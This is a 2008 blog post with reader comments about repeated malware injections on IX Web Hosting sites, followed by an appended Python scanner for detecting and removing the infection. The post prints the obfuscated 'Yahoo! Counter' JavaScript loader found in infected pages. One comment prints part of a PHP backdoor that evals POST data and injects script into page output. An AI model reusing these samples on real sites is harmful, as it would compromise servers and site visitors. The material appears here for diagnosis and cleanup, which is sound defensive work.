IX Web Hosting Injected TODAY

Posted: December 19, 2008 in IX Web Hosting

Dec. 19, 2008

I can confirm that IX Web Hosting's database server "mysql27.ixwebhosting.com" (the injected sites were on "ns5.ixwebhosting.com" and "ns6.ixwebhosting.com") has yet again been injected, within a week of IX Web Hosting sending an email stating that all their servers were clean. I quote from the email sent by Fatima Said, CCO IX Web Hosting:

"We have dedicated our systems administration team to finding a solution to this and are happy to say that as one of the first hosting companies we have successfully cleaned all instances of this virus from our servers more than a week ago, and are continually scanning them to ensure your site does not become re-infected."

This just goes to show that IX web hosting has not got a clue where to start looking and what to clean.


The injected code appears in every file:

<script language=javascript><!-- Yahoo! Counter starts
if(typeof(yahoo_counter)!=typeof(1))eval(unescape('%2F@/%3C~%64%69&v%20`s!t~%79l#e=%64%69%73p%6C%61~y~%3A%6Eo%6E%65%3E!\nd%6F$%63%75%6D%65%6E#%74%2E!w`r$%69$%74%65%28%22%3C%2F%74!%65~%78t%61!%72@%65&a&%3E@%22|)~%3B|v`a%72%20#%69,%5F`,a%3D!["!7$%38&%2E110~.1%37@%35`.!%321$%22%2C%22!%319~5~.24%2E|%37$%36#%2E%32%35%31%22%5D`%3B~_=~1!%3Bi|f(|do!c%75%6D%65nt@%2E~c#%6F%6F&%6B%69~%65%2E%6D&a~tc%68!(&%2F%5C#bh&%67&%66t@=1%2F)%3D$%3D$%6E|%75l&%6C`%29f#o%72(%69|=%30&%3B|i~%3C@%32!%3B%69+~%2B~%29d|ocu%6Dent%2E&%77~%72%69%74%65("~%3C`s`c`r%69&p%74`%3E%69f|%28%5F@%29do%63%75m$%65`%6E%74`%2E%77~rit$%65|%28%5C|"#%3C#s&c&r@ip%74$%20%69@%64%3D!_~"+i+`%22_%20|%73%72%63!%3D%2F/#%22|+a#%5Bi|%5D%2B#%22/~%63!p%2F?`"%2B!n`%61#v&%69ga%74%6F!%72%2Ea%70%70`%4E%61%6De`%2Ec!%68$%61%72`A|t&(@0`%29#%2B%22#%3E%3C%5C%5C@/`%73%63@%72&i|p`t@%3E%5C|"~)`%3C#%5C&/!s~c$%72~%69$%70&t!%3E")#;#\n%2F&%2F$%3C#%2F&d%69%76!%3E').replace(/@|\!|#|\&|`|~|\||\$/g,""));var yahoo_counter=1;
<!-- counter end --></script>

Comments
  1. Rene Madsen says:

    We have had the same experience with IXwebhosting: several of our sites have had hacker code introduced. On 20.12.2008, encoded javascript was added, as illustrated in the article.

    IXwebhosting's support department believes that open scripts and 777 permissions are to blame for the hacking, which we can refute. They've created a user who comes from root or other administrative use and places the encoded files, etc. Watch out: if your file is not addressed, then check all files for this code.

    Dear René,
    We are extremely sorry for the trouble you have faced.
    Please note that most hacker attacks are done through vulnerabilities in the website software you are using (forums, blogs, CMS). We cannot keep them secured as we are not the developers of such software. From our side, we keep all server-side software (web services, FTP services, etc.) up-to-date and protected. Anyway, it is strongly recommended to review everything you have in your website folder and check the web server logs to determine how you can protect your application against further intrusions. If you have any widely-used software installed, check the vendor site for recent updates or security fixes.

    The attack that happened to your sites could have been made via FTP access to your account. Unfortunately, we don't suggest a secure FTP connection, for the reason of shared hosting. Please change the FTP passwords under the FTP MANAGER icon: opposite the password field, click Edit. Please take all appropriate measures to prevent other people from accessing your FTP account and using your FTP login information.
    Please note that your files are located on a Linux-based server and you are able to change file/folder permissions, so make sure you do not have any "open" files/folders with write permissions set for all.
    So please check whether any folders have full permissions (777) set, which means they are world-writeable for anyone from the Web. Recommended permissions are 755 or 644.

    Should you have any further questions, feel free to contact us at anytime, we are available 24/7.
    With regards, Lesya Geychenko.
    Ecommerce corp. CR Dept.

    Our company works every day with Linux servers, and all permissions are correct.

    This is the code which produces the encoded script; it should be removed from the files:

    <?php if(!function_exists('tmp_lkojfghx')){
    for($i=1;$i<100;$i++)if(is_file($f='/tmp/m'.$i)){include_once($f);break;}
    if(isset($_POST['tmp_lkojfghx3']))eval($_POST['tmp_lkojfghx3']);
    if(!defined('TMP_XHGFJOKL'))define('TMP_XHGFJOKL',base64_decode('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'));
    function tmp_lkojfghx($s){if($g=(bin2hex(substr($s,0,2))=='1f8b'))$s=gzinflate(substr($s,10,-8));if(preg_match_all('#<script(.*?)#is',$s,$a))foreach($a[0] as $v)if(count(explode("\n",$v))>5){$e=preg_match('#[\'\"][^\s\'\"\.,;\?!\[\]:/\(\)]{30,}#',$v)||preg_match('#[\(\[](\s*\d+,){20,}#',$v);if((preg_match('#\beval\b#',$v)&&($e||strpos($v,'fromCharCode')))||($e&&strpos($v,'document.write')))$s=str_replace($v,'',$s);}$s1=preg_replace(base64_decode('IzxzY3JpcHQgbGFuZ3VhZ2U9amF2YXNjcmlwdD48IS0tIFlhaG9vISBDb3VudGVyIHN0YXJ0cy4rPzwvc2NyaXB0Pgojcw=='),'',$s);if(stristr($s,'</body'))$s=preg_replace('#(\s*</body)#mi',str_replace('\$','\\\$',TMP_XHGFJOKL).'\1',$s1);elseif(($s1!=$s)||defined('PMT_knghjg')||stristr($s,'<body')||stristr($s,''))$s=$s1.TMP_XHGFJOKL;return $g?gzencode($s):$s;}
    function tmp_lkojfghx2($a=0,$b=0,$c=0,$d=0){$s=array();if($b&&$GLOBALS['tmp_xhgfjokl'])call_user_func($GLOBALS['tmp_xhgfjokl'],$a,$b,$c,$d);foreach(@ob_get_status(1) as $v)if(($a=$v['name'])=='tmp_lkojfghx')return;else $s[]=array($a=='default output handler'?false:$a);for($i=count($s)-1;$i>=0;$i--){$s[$i][1]=ob_get_contents();ob_end_clean();}ob_start('tmp_lkojfghx');for($i=0;$i

    Best regards
    René Madsen
    Search engine optimisation and SEO

  2. Chris says:

    Funny how IX Web doesn't "suggest secure FTP connection" on a shared host solution. Maybe they don't suggest it because they don't EVEN OFFER IT???? I was going to set up the keys for SFTP yesterday and noticed they don't even support it. Doesn't everyone pretty much support it anymore? I know Bluehost does.

    Very disappointing. Again.

  3. mikeb12 says:

    Not sure if this helps anyone here, but I'll post in case it does…

    I am also an IX customer and was hit by the yahoo counter on a phpbb2 board about a month ago. I created a trouble ticket and they told me to upgrade and change the FTP and database passwords. It didn't help. Then I chatted online with a support rep at IX for about 30 minutes and linked them to the various threads about the issue, and they said "we are working on it". I asked if they had an ETA or any details on what I can do to fix it. The rep told me they are not allowed to talk about it publicly.

    So needless to say, I went hunting for a DIY solution… found many links including this one, but no real answers on how to remove it.

    Long story short, after hours of combing through files, I found nothing. So I went hunting in phpMyAdmin and found it hiding in 2 tables, CONFIG and CATEGORIES.
    I removed the counter script from these 2 tables and it cleared my site of it. http://www.doxietown.com/phpBB2/index.php

    Here's where I found mine:
    it was in 2 tables (categories and config) in phpMyAdmin. Some screenshots below on how I removed it.

    from categories table

    and from config table

    Hope that helps some of the phpBB users. Obviously IX is not at the point of fixing it yet; I had to do it on my own.
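As an added example (editor's code, not from the post or any commenter), a small Python scanner covering three things described on this page: it detects and strips the "Yahoo! Counter" block using the same signature the PHP backdoor in comment 1 uses to remove rival copies (decoded from its base64 constant), it undoes the loader's unescape-plus-filler obfuscation without eval so the second-stage host can be read off, and it flags the identifiers of that PHP output-buffer backdoor. The sample HTML, payload and PHP fragment are constructed, with a TEST-NET address standing in for the real hosts; the same strip function can be run over values pulled from the phpBB config and categories tables mentioned in comment 3.

```python
import re
import urllib.parse

# Signature of the injected block quoted in the post. The PHP backdoor in the
# comments strips rival copies with this exact pattern (its base64 constant
# decodes to it), so it doubles as a precise detector.
COUNTER_RE = re.compile(
    r"<script language=javascript><!-- Yahoo! Counter starts.+?</script>\n?",
    re.S)
PAYLOAD_RE = re.compile(r"unescape\('([^']*)'\)")
# After unescape() the loader deletes these filler characters.
JUNK_RE = re.compile(r"[@!#&`~|$]")
# Identifiers of the PHP output-buffer backdoor quoted in comment 1.
PHP_BACKDOOR_RE = re.compile(
    r"tmp_lkojfghx|eval\(\$_POST\[|is_file\(\$f='/tmp/m'|ob_start\('tmp_")

def strip_counter(html):
    """Return (cleaned_html, blocks_removed); works on DB column values too."""
    return COUNTER_RE.subn("", html)

def deobfuscate(payload):
    """Static equivalent of the loader's unescape() + filler removal."""
    return JUNK_RE.sub("", urllib.parse.unquote(payload))

def decoded_payloads(html):
    """Decode every Yahoo! Counter payload found in html."""
    return [deobfuscate(PAYLOAD_RE.search(block).group(1))
            for block in COUNTER_RE.findall(html) if PAYLOAD_RE.search(block)]

def loaded_hosts(decoded_js):
    """Hosts the decoded loader would fetch its second stage from."""
    return re.findall(r"src=//([\w.\-]+)", decoded_js)

def php_backdoor_indicators(src):
    """Distinct backdoor identifiers present in a PHP source string."""
    return sorted({m.group(0) for m in PHP_BACKDOOR_RE.finditer(src)})

# Constructed sample: same structure as the page's injection, benign host.
SAMPLE_PAYLOAD = ("d%6Fc|u%6D`ent~%2Ew%72!ite(%22%3Cs#cr&ipt%20src%3D//203$"
                  ".0.1~13.5/c%70/%3E%3C/s@cript%3E%22)")
SAMPLE_HTML = (
    "<html><body><h1>Welcome</h1>\n"
    "<script language=javascript><!-- Yahoo! Counter starts\n"
    "if(typeof(yahoo_counter)!=typeof(1))eval(unescape('" + SAMPLE_PAYLOAD +
    "').replace(/@|\\!|#|\\&|`|~|\\||\\$/g,''));var yahoo_counter=1;\n"
    "<!-- counter end --></script>\n</body></html>\n")
SAMPLE_PHP = ("<?php if(!function_exists('tmp_lkojfghx')){if(isset($_POST"
              "['tmp_lkojfghx3']))eval($_POST['tmp_lkojfghx3']);"
              "ob_start('tmp_lkojfghx');} ?>")
```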
